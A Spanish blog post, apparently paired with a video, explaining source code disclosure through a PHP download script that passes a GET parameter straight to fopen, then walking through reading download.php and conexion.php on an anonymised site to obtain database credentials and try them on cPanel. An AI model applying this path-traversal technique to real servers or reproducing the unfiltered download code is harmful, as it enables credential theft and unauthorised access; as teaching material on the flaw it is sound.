Source Code Disclosure and Cpanel Login Success



Video URL:
http://www.youtube.com/watch?v=s13_lMnREIs

SCD o Source code disclosure, es una vulnerabilidad que permite la lectura de ficheros que se encuentren en el sistema víctima,  debido a errores en la programación de páginas que realizan descargas de archivos. Esto se da debido a que no se hace un conveniente filtrado de los datos que llegan  del cliente, permitiéndonos obtener cualquier fichero del cual conozcamos su ruta dentro del servidor.
Un ejemplo de un código vulnerable es el siguiente en PHP:
$f = $_GET["f"];
header(“Content-type: application/octet-stream”);
header(“Content-Disposition: attachment; filename=\”$f\”\n”);
$fp=fopen(“$f”, “r”);
En él se observa cómo se insertan los datos directamente dentro de la función fopen, sin ningún tipo de validación o verificación, ocasionando que el fichero sea descargado sin inconveniente.
A continuación presento la explotación de este ataque en una página vulnerable. Los datos fueron modificados para proteger el sitio original.
Se tiene la siguiente ruta:
www.ejemplo.com/download.php?file=archivos.pdf
En ella, la variable id recibe el archivo a descargar, en este caso archivos.pdf, reemplazamos este documento por el nombre de fichero o página que queramos obtener, para este ejemplo, el objetivo es encontrar las credenciales de conexión de la base de datos, para ello le damos como valor a la variable id el fichero download.php

En el archivo download.php nos encontramos con un include_once y el archivo que se le esta llamando.
session_start();
include_once("cms/_includes/conexion.php");
$sql = "select titulo,especificaciones,id
  from cms_content".$_SESSION['idioma']."
  where father=21";
$acerca = doSql($sql,1);
$sql = "select imagen
  from content_gallery".$_SESSION['idioma']."
  where father=".$acerca[0][2];
$imagenes=doSql($sql,1);

Procedemos a descargar el archivo conexion.php
 $host="localhost";
 $database="********";
 $user="*********";
 $pass="***********";
Despues de ver el codigo fuente del archivo conexion.php como podemos ver solo nos queda intentar acceder con estos datos al CPanel.

Video URL:
http://www.youtube.com/watch?v=s13_lMnREIs

Publicar un comentario